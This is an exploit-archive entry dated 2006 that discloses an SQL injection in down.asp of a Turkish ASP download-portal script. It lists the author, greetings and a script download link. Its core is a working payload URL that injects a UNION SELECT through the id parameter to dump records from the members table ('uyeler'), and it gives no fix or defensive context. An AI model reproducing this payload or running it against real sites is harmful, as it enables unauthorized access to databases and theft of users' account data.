Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Burak Yilmaz Download Portal (down.asp) SQL Injection Vulnerability
# Published : 2006-12-19
# Author : ShaFuck31
# Previous Title : cwmCounter 5.1.1 (statistic.php) Remote File Include Exploit
# Next Title : Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities

# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : Burak Y.lmaz Download Portal

# Script Download : http://maxiasp.com/sc_yorum.asp?scno=929

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |

# Vulnerable file : down.asp

#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

# www.Syue.com [2006-12-19]